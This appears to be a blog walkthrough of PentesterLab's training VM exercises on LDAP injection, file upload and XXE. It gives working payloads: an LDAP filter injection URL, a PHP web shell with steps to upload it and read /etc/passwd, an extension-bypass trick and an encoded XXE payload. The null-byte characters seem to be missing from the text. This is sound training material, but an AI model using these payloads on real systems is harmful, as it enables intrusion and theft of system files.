In this post ill be walking through the web for pentesters 1 LDAP, file upload and XML attacks. These are the last of the exercises for the virtual machine and will conclude this series.
First off what is LDAP? LDAP (lightweight Directory Access Protocol) is a protocol for accessing and maintaining a directory over the internet. So it basically allows a user to access a directory remotely and modify it as if they where on that physically on that machine.
LDAP Answers:
Example 1:
For the first example, we just remove everything in the URL from php? on-wards and this should result in you being authenticated.
Example 2:
For example 2 you will need to comment out the rest of the code and have the protocol accept any password you pass it.
the URL you end up with should look something like this:
example2.php?name=hacker)(cn=*))&password=fake.
is a null byte that comments out any code after it.
File Upload:
The code we will use in the file that will be uploaded if the following:
<?php
system($_GET[“cmd”]);
?>
Copy that into the a php file.
example 1:
Upload the php file with the code above, once uploaded follow the link provided by the vm.
Once on that page, you should get an error saying the system cannot execute a blank command
All you now have to do is append ?cmd=cat /etc/passwd to output the passwd file contents on the page.
example 2:
For this example you will need to create a new file with the code above and the extension .php.blah, you swap blah for something else, just make sure the server can’t process it.
Upload the file, click the link and you should get the same error you got in example 1. Now all you have to do is append ?cmd=cat /etc/passwd to the URL and you should get the passwd file displayed.
XML attack:
Example 1:
Here all you have to is type in the command provided by pentesterlabs into the URL with a null byte () at the end and the exploit should work.
<%21DOCTYPE%20test%20%5b<%21ENTITY%20hacker%20SYSTEM%20″file%3a%2f%2f%2fetc%2fpasswd”>%5d><test>%26hacker%3b<%2ftest>%0a%0a
Example 2:
If you follow what is on pentesterslab, the exploit should work and give you the password pentesterlab.
main 